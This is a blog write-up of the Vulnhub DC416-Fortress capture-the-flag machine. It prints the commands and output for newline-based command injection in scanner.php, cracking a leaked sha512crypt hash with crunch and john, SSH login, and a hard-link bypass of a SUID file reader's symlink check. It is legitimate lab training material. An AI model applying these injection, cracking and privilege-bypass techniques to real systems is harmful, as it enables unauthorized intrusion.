[Vulnhub] DC416-Fortress

Lets try to breach this fortress!

nmap

nmap -v -sV 192.168.1.13

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2 (FreeBSD 20160310; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
443/tcp open  ssl/http Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)

from the nmap scan we can see that port 443 is open, when we visit this we get this website
which tells us the the engagement rules for this Virtual Machine.

website

i start by launching a dirbuster scan on the website and then we find /scanner.php

dirbuster

scanner.php rce anyone?

now lets visit this page.

scanner

on this scanner.php page we have a function that allows us to do a portscan, hmm this smells like RCE to me, lets try, after trying several things, like | & ; etc it seems like that is not the way to bypass it, so i decide to boot up burpsuite and intercept the request, then we can send this to the repeater, to try more bypass methods.

burp

nice we managed to bypass it by trying the ls -lah command on a new line, now we have RCE, from here we can see some interesting directories, k1ngd0m_k3yz, s1kr3t
when we do

ls s1kr3t, we see the flag.txt file

cat s1kr3t/flag.txt

Gives us the flag  : FLAG{n0_one_br3aches_teh_f0rt}

nice 2 more to go, lets see what other stuff we can find on this box, lets look at the k1ngd0m_k3yz directory.

cat k1ngd0m_k3yz/master

craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh

cat k1ngd0m_k3yz/passwd

craven:*:1002:1002:User &:/home/craven:/bin/sh

nice now we have the shadow and passwd file, now we can later use john to unshadow these files, if we have to crack it probably for SSH access, since we could see that port 22 was open.

lets look for other flags, by using the find command.

find / -name “flag.txt”

/usr/local/www/apache24/data/s1kr3t/flag.txt
/usr/home/vulnhub/flag.txt
/usr/home/craven/flag.txt

ls -lah /usr/home/craven

total 120
drwxr-xr-x  2 craven  craven   512B Nov  9 19:58 .
drwxr-xr-x  4 root    wheel    512B Nov  5 01:59 ..
-rw-r–r–  1 craven  craven   1.0K Nov  5 01:59 .cshrc
-rw——-  1 craven  craven     5B Nov  7 20:24 .gdb_history
-rw-r–r–  1 craven  craven    60B Nov  7 20:36 .gdbinit
-rw-r–r–  1 craven  craven   254B Nov  5 01:59 .login
-rw-r–r–  1 craven  craven   163B Nov  5 01:59 .login_conf
-rw——-  1 craven  craven   379B Nov  5 01:59 .mail_aliases
-rw-r–r–  1 craven  craven   336B Nov  5 01:59 .mailrc
-rw-r–r–  1 craven  craven   802B Nov  5 01:59 .profile
-rw——-  1 craven  craven   281B Nov  5 01:59 .rhosts
-rw-r–r–  1 craven  craven   978B Nov  5 01:59 .shrc
-r——–  1 craven  craven    46B Nov  6 01:30 flag.txt
-rw-r–r–  1 craven  craven   119B Nov  5 02:23 hint.txt
-rw-r–r–  1 craven  craven    77B Nov  5 02:20 reminders.txt

so it looks like we need to be user craven, to see the contents of the flag.txt file
lets look at those other text files, hint and reminders.txt

cat /usr/home/craven/hint.txt

Keep forgetting my password, so I made myself a hint. Password is three digits followed by my pet’s name and a symbol.

crunch 10 10 -t %%%qwerty^ > passlist.txt

so now the unshadow thing comes in handy, so we do

unshadow passwd shadow > crackthis

after we done this we can now let john do its thing.

john -wordlist=/root/Desktop/passlist.txt crackthis

Warning: detected hash type “sha512crypt”, but the string is also recognized as “crypt”
Use the “–format=crypt” option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press ‘q’ or Ctrl-C to abort, almost any other key for status
931qwerty?       (craven)
1g 0:00:00:42 DONE (2016-12-18 22:44) 0.02369g/s 729.3p/s 729.3c/s 729.3C/s 930qwerty?..932qwerty>
Use the “–show” option to display all of the cracked passwords reliably
Session completed

so the password is 931qwerty?  — make sure to include the question mark

ssh craven@192.168.1.13

$ pwd
/usr/home/craven
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

Allright now on to the next flag, we already knew where it was since we used find before.

$ pwd
/home/vulnhub

we see that there is a SUID binary if we do file we get this

$ file reader
reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped

lets try to parse it the flag.txt

$ ./reader
./reader [file to read]
$ ./reader flag.txt
Checking file type…
Checking if flag file…
Nope. Can’t let you have the flag.

ofcourse thats not gonna work that will be to easy haha. lets see what the command strings can find

$ strings reader

[snippet]

%s [file to read]
Checking file type…
Symbolic links not allowed!
Checking if flag file…
flag
Nope. Can’t let you have the flag.
Great! Printing file contents…
Win, here’s your flag:

hmm, it looks like we can use a symbolic link to maybe bypass this, lets try that

$ cd /tmp
$ ln /home/vulnhub/flag.txt giefplix
$ cd /home/vulnhub/
$ ./reader /tmp/giefplix
Checking file type…
Checking if flag file…
Great! Printing file contents…
Win, here’s your flag:
FLAG{its_A_ph0t0_ph1ni5h}

Yay we got the last flag! the fortress has been breached Thanks to @Vulnhub and @superkojiman and the Community for hosting challenges like this.

basebelongus

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s